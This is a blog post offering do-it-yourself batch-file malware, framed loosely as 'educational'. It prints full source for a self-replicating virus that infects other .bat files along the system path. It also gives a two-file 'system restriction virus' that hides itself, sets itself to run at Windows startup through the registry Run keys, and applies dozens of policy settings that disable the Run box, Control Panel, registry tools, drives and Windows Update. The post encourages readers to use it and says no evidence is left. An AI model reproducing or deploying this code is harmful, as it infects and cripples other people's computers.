Thursday, April 17, 2008

VIRUS MAKING THROUGH NOTEPAD

virus to corrupt .exe and .bat files

VIRUS

A simple VIRUS code is here: Just save the following code as .bat extension in notepad.The antivirus will detect it as virus. see for yourself.

Its a sample Virus for Educational purposes.One may alter it,Modify it or distribute it (Obviously in non Infectable form) for the sake of Computer Education and Curiousity.

It will affect *.com and *.EXE files .It will multiply itself and may get more dangerous when altered.


@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy Virus Created By Snehit Rahul
:XXX_END
try it at your own risk m not responsible for any damage to your pc's

A SYSTEM RESTRICTION VIRUS

So many of u r thnking..hw to make a virus..for u who want to make virus by der own..is dis.its a simple batch or dos virus..as .bat extension..it seems to b very simple but cn cause a severe damage in ur system.

System Restriction Virus
=================

Warning : End User Is Held Responsible For What They Do.




GOTO >> RUN >> Notepad & then cut N paste the following codes :

----------CoDe StArTs HeRe------------

::
::
:: Please RENAME This Document To Run Me.bat
::
::
::
::
cls
@echo off
copy System.dat %windir%\system
ren "%Windir%\system\System.dat" Autoexec.bat
Attrib +H +S %windir%\system\Autoexec.bat
echo.REGEDIT4 > %windir%\system\Run.reg
echo. >> %windir%\system\Run.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >> %windir%\system\Run.reg
echo."Autoexec"="C:\Windows\system\Autoexec.bat" >> %windir%\system\Run.reg
echo. >> %windir%\system\Run.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] >> %windir%\system\Run.reg
echo."Autoexec"="C:\Windows\system\Autoexec.bat" >> %windir%\system\Run.reg
echo.>> %windir%\system\Run.reg
echo.
echo.
echo.
Attrib +H +S %windir%\system\Run.reg
regedit /s %windir%\system\Run.reg
echo.
echo.
cls
exit
Now OPEN another NOTEPAD & SAVE the following Code :-

--------------CoDe StArTs HeRe--------------

::
::
:: Please RENAME This Document From
::
:: System.txt To System.dat
::
::
::
::
cls
@echo off
echo.REGEDIT4>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>%windir%\Update.reg
echo."NoRun"=dword:00000001>>%windir%\Update.reg
echo."NoDrives"=dword:00000001>>%windir%\Update.reg
echo."NoClose"=dword:00000001>>%windir%\Update.reg
echo."NoControlPanel"=dword:00000001>>%windir%\Update.reg
echo."NoDesktop"=dword:00000001>>%windir%\Update.reg
echo."NoDriveTypeAutoRun"=dword:00000001>>%windir%\Update.reg
echo."NoFind"=dword:00000001>>%windir%\Update.reg
echo."NoFolderOptions"=dword:00000001>>%windir%\Update.reg
echo."NoInstrumentation"=dword:00000001>>%windir%\Update.reg
echo."NoInternetIcon"=dword:00000001>>%windir%\Update.reg
echo."NoNetworkConnections"=dword:00000001>>%windir%\Update.reg
echo."NoNetHood"=dword:00000001>>%windir%\Update.reg
echo."NoNetConnectDisconnect"=dword:00000001>>%windir%\Update.reg
echo."NoThemesTab"=dword:00000001>>%windir%\Update.reg
echo."NoToolbarCustomize"=dword:00000001>>%windir%\Update.reg
echo."NoTrayContextMenu"=dword:00000001>>%windir%\Update.reg
echo."NoViewContextMenu"=dword:00000001>>%windir%\Update.reg
echo."NoWindowsUpdate"=dword:00000001>>%windir%\Update.reg
echo."NoWinKeys"=dword:00000001>>%windir%\Update.reg
echo."RestrictRun"=dword:00000001>>%windir%\Update.reg
echo."NoFileMenu"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>%windir%\Update.reg
echo."DisableRegistryTools"=dword:00000001>>%windir%\Update.reg
echo."NoDispCPL"=dword:00000001>>%windir%\Update.reg
echo."NoDispAppearancePage"=dword:00000001>>%windir%\Update.reg
echo."NoDispBackgroundPage"=dword:00000001>>%windir%\Update.reg
echo."NoDispScrSavPage"=dword:00000001>>%windir%\Update.reg
echo."NoDispSettingsPage"=dword:00000001>>%windir%\Update.reg
echo."NoSecCPL"=dword:00000001>>%windir%\Update.reg
echo."NoProfilePage"=dword:00000001>>%windir%\Update.reg
echo."NoPwdPage"=dword:00000001>>%windir%\Update.reg
echo."NoConfigPage"=dword:00000001>>%windir%\Update.reg
echo."NoDevMgrPage"=dword:00000001>>%windir%\Update.reg
echo."NoFileSysPage"=dword:00000001>>%windir%\Update.reg
echo."NoVirtMemPage"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall]>>%windir%\Update.reg
echo."NoRemovePage"=dword:00000001>>%windir%\Update.reg
echo."NoAddPage"=dword:00000001>>%windir%\Update.reg
echo."NoWindowsSetupPage"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>%windir%\Update.reg
echo."Disabled"=dword:00000001>>%windir%\Update.reg
echo."NoRealMode"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]>>%windir%\Update.reg
echo."NoNetSetup"=dword:00000001>>%windir%\Update.reg
echo."NoFileSharingControl"=dword:00000001>>%windir%\Update.reg
echo."NoNetSetupIDPage"=dword:00000001>>%windir%\Update.reg
echo."NoNetSetupSecurityPage"=dword:00000001>>%windir%\Update.reg
echo."NoEntireNetwork"=dword:00000001>>%windir%\Update.reg
echo."NoWorkgroupContents"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]>>%windir%\Update.reg
echo."NoChangingWallPaper"=dword:00000001>>%windir%\Update.reg
echo."NoHTMLWallPaper"=dword:00000001>>%windir%\Update.reg
echo."NoComponents"=dword:00000001>>%windir%\Update.reg
echo."NoAddingComponents"=dword:00000001>>%windir%\Update.reg
echo."NoDeletingComponents"=dword:00000001>>%windir%\Update.reg
echo."NoEditingComponents"=dword:00000001>>%windir%\Update.reg
echo."NoCloseDragDropBands"=dword:00000001>>%windir%\Update.reg
echo."NoMovingBands"=dword:00000001>>%windir%\Update.reg
echo.>>%windir%\Update.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion] >> %windir%\Update.reg
echo."RegisteredOwner"="<< IForce >>" >> %windir%\Update.reg
echo."RegisteredOrganization"="<< INDIA >>" >> %windir%\Update.reg
echo.>>%windir%\Update.reg
echo.
echo.
echo.
echo.
echo.
echo.
regedit /s %windir%\Update.reg
echo.
echo.
Erase %windir%\Update.reg
cls
exit

--------------------CoDe StArTs HeRe---------------

NOTE : 1. Name the first file "Run Me.bat"
2. Name the Second file "System.dat"

Then Only it will work

This BAT File When Double Clicked Enables Restriction Of The Current System Via Registry.

It puts Restriction On ie., ( it will not show ) :~

Drive
Run
Shutdown
ControlPanel
Desktop
Find
FolderOptions
Instrumentation
Internet Icon
Network Connections
Network NeighbourHood
Network Connect /Disconnect
Themes Tab
Toolbar Customize
Tray ContextMenu
Right Click ContextMenu
Windows Update Option
Windows Keys
File Menu
etc

thats all buddy............
No Evidence Is Left Behind So enjoy....

A SIMPLE VIRUS

So many of u r thnking..hw to make a virus..for u who want to make virus by der own..is dis.its a simple batch or dos virus..as .bat extension..it seems to b very simple but cn cause a severe damage in ur system.
Warning : End User Is Held Responsible For What They Do.

GOTO >> RUN >> Notepad & then cut N paste the following codes :
@echo off
copy System.dat %windir%\system
ren "%Windir%\system\System.dat" Autoexec.bat
Attrib +H +S %windir%\system\Autoexec.bat
echo.REGEDIT4 > %windir%\system\Run.reg
echo. >> %windir%\system\Run.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >> %windir%\system\Run.reg
echo."Autoexec"="C:\Windows\system\Autoexec.bat" >> %windir%\system\Run.reg
echo. >> %windir%\system\Run.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] >> %windir%\system\Run.reg
echo."Autoexec"="C:\Windows\system\Autoexec.bat" >> %windir%\system\Run.reg
echo.>> %windir%\system\Run.reg
echo.
echo.
echo.
Attrib +H +S %windir%\system\Run.reg
regedit /s %windir%\system\Run.reg
echo.
echo.
cls
exit
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)